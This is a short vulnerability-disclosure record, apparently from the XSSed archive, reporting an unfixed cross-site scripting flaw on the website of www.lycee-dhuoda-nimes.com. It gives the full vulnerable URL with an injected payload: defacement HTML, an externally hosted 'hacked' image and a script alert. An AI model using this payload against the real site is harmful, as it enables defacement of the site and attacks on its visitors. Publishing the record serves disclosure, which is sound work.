Unfixed XSS vulnerability at www.lycee-dhuoda-nimes.com

2009-02-22T00:00:00
ID XSSED:58392
Type xssed
Reporter 599eme Team
Modified 2011-12-16T00:00:00

Description

Security researcher 599eme Team, has submitted on 22/02/2009 a cross-site-scripting (XSS) vulnerability affecting www.lycee-dhuoda-nimes.com, which at the time of submission ranked 12950606 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.lycee-dhuoda-nimes.com/services/emplois/d_affichez.php?Num=%3Ccenter%3E%3Cp%3E%3Ch1%20style=%22color:%20rgb(255,%200,%200);%20font-family:%20Bradley%20Hand%20ITC;%22%3EFound%20by%20599eme%3C/h1%3E%3C/p%3E%3CIMG%20SRC=http://img205.imageshack.us/img205/7531/hacked28hiax0.png%3E%3E%3Cp%3E%3Ch1%20style=%22color:%20rgb(255,%200,%200);%20font-family:%20Bradley%20Hand%20ITC;%22%3EFound%20by%20599eme%3C/h1%3E%3C/p%3E%3C/center%3E%3Cscript%3Ealert(%27XSS%20By%20599eme)%3C/script%3E